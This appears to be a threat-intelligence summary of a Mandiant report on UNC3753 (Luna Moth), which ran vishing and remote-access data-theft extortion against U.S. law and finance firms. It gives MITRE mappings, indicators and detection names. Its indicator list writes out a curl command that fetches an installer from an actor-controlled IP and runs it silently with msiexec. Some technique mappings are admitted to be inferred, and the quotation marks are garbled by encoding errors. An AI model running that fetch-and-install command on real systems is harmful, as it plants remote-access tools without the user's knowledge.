Mandiant reported that UNC3753, also known as Luna Moth, Chatty Spider, and Silent Ransom Group, ran a fast-moving data theft extortion campaign against U.S. professional, legal, and financial services organizations by using vishing, screen-sharing, RMM tools, and sometimes physical office access. The group stole sensitive data such as legal agreements, PII, and financial records, then used extortion emails and the LEAKEDDATA site to pressure victims into paying. #UNC3753 #LunaMoth #ChattySpider #SilentRansomGroup #LEAKEDDATA
Keypoints
- UNC3753 targeted dozens of U.S. organizations in professional, legal, and financial services from January through May 2026.
- The group relied on voice phishing and IT helpdesk impersonation to convince victims to join screen-sharing sessions and install remote access tools.
- Attackers used benign invoice-themed emails, Privnote messages, and commercial RMM tools such as AnyDesk, Bomgar, Zoho Assist, and SuperOps to gain and maintain access.
- Once inside, they searched file systems, OneDrive, iManage, and network drives to stage and steal sensitive documents, including PII, tax forms, and client agreements.
- Exfiltration was carried out through WinSCP, Rclone, consumer file-sharing accounts, Gmail-like email forwarding, and cloud storage uploads.
- Mandiant also assessed that some associated actors attempted physical office intrusion and direct USB-based theft from endpoints.
- The group followed stolen-data theft with aggressive extortion emails and threats to publish data on the LEAKEDDATA data leak site.
MITRE Techniques
- [T1566.004] Phishing: Spearphishing Voice â Used vishing calls while impersonating IT staff to direct victims into screen-sharing sessions and remote access setup (âacting as members of the organizationâs internal IT helpdesk or security team, threat actors place direct callsâ).
- [T1133] External Remote Services â Gained access through remote desktop/support services and VDI/VPN-enabled remote environments (âjoin a screen-sharing sessionâ and access corporate VDI).
- [T1204.002] User Execution: Malicious File â Tricked users into downloading and executing installers and payloads such as RMM agents (âconvincing the target to download and execute a payloadâ).
- [T1059.001] Command and Scripting Interpreter: PowerShell â Inferred by the articleâs MITRE list and remote execution activity that used scripted administrative actions (âdownload and execute a payload via a cURL commandâ).
- [T1059.003] Command and Scripting Interpreter: Windows Command Shell â Used command-line execution to launch installers and scripts (âcurl -sL ⌠-o âSuperOps.msiâ && msiexec /i âSuperOps.msiâ /quietâ).
- [T1569.002] System Services: Service Execution â Installed software through system service-based execution such as MSI installation (âmsiexec /i âSuperOps.msiâ /quietâ).
- [T1053.005] Scheduled Task/Job: Scheduled Task â Listed as a technique in the campaignâs MITRE mapping, indicating use of scheduled execution for persistence (âScheduled Task/Job: Scheduled Taskâ).
- [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys â Listed as a persistence method in the MITRE mapping (âRegistry Run Keysâ).
- [T1036.005] Masquerading: Match Legitimate Name or Location â Used brand-like folder names and legitimate-looking lures to blend in (âfolders explicitly renamed to mimic the victim organizationâs brandingâ).
- [T1553.002] Subvert Trust Controls: Code Signing â Listed in the MITRE mapping, indicating abuse of trusted software or signed binaries (âSubvert Trust Controls: Code Signingâ).
- [T1562.001] Impair Defenses: Disable or Modify Tools â Attempted to evade controls by using tools and methods that bypass endpoint restrictions (âbypass conventional automated boundary security and email filtering controlsâ).
- [T1070.001] Indicator Removal: Clear Windows Event Logs â Listed in the MITRE mapping, suggesting log cleanup to hide activity (âClear Windows Event Logsâ).
- [T1003.001] OS Credential Dumping: LSASS Memory â Listed in the MITRE mapping as a credential access technique (âLSASS Memoryâ).
- [T1003.002] OS Credential Dumping: Security Account Manager â Listed in the MITRE mapping as another credential dumping technique (âSecurity Account Managerâ).
- [T1083] File and Directory Discovery â Enumerated local directories, OneDrive folders, and network drives to find valuable data (âmap local directories, enumerate active OneDrive folders, and crawl mapped network drivesâ).
- [T1135] Network Share Discovery â Searched mapped network drives and shared resources to locate target repositories (âcrawl mapped network drivesâ).
- [T1046] Network Service Discovery â Listed in the MITRE mapping, consistent with discovery of accessible services and network paths (âNetwork Service Discoveryâ).
- [T1219] Remote Access Software â Abused commercial remote access tools such as AnyDesk, Bomgar, Zoho Assist, Zoom, Teams, and Quick Assist (âdownload AnyDesk, Bomgar, or Zoho Assist installersâ).
- [T1021.001] Remote Services: Remote Desktop Protocol â Used native remote desktop/virtual desktop services during access and pivoting (âMicrosoft Terminal Servicesâ and VDI sessions).
- [T1021.004] Remote Services: SSH â Used SSH-based transfer tools and monitored SSH traffic during exfiltration (âMonitor SSH traffic (Port 22) from internal VDIsâ).
- [T1005] Data from Local System â Collected files from local endpoints, Downloads folders, Roaming profiles, and OneDrive (âstaged results are compiled ⌠inside the userâs Downloads folderâ).
- [T1572] Protocol Tunneling â Listed in the MITRE mapping, indicating use of network tunneling or relayed channels (âProtocol Tunnelingâ).
- [T1020] Automated Exfiltration â Automated large-scale transfers with tools like WinSCP and Rclone (âfrequently use portable versions of WinSCP or Rcloneâ).
- [T1567.002] Exfiltration Over Web Service: Exfiltration to Cloud Storage â Uploaded stolen data to Google Drive and consumer file-sharing accounts (âbatch upload the stolen filesâ).
- [T1052.001] Exfiltration Over Physical Medium â Attempted to copy data to USB storage during in-person office access (âexfiltrate corporate data directly to an external driveâ).
- [T1486] Data Encrypted for Impact â Listed in the MITRE section, though the campaign described focused on extortion rather than encryption (âData Encrypted for Impactâ).
Indicators of Compromise
- [IPv4 Address ] IOC collection associated with UNC3753 infrastructure â 192.236.147.131, 192.236.147.138, and other 5 addresses
- [Domain ] Data leak site and phishing infrastructure â business-data-leaks[.]com, privnote[.]com
- [Phishing domain pattern ] Actor-registered IT/helpdesk-themed domains used for social engineering â -itdesk[.]com, -helpdesk[.]com, and other similar domains
- [File name / installer ] Payload staging and remote access installation â SuperOps.msi, anydesk, bomgar, and zoho assist installers
- [Command / URL ] cURL-based download and MSI execution string used in remote sessions â curl -sL âhttp://[actor-controlled-ip]/installerâ -o âSuperOps.msiâ && msiexec /i âSuperOps.msiâ /quiet
- [Threat-hunting rule names ] Google SecOps detections for this activity â Execute MSI Files Downloaded via Curl, Suspected Rclone Exfiltration
Read more: https://cloud.google.com/blog/topics/threat-intelligence/targeted-campaign-us-law-firms/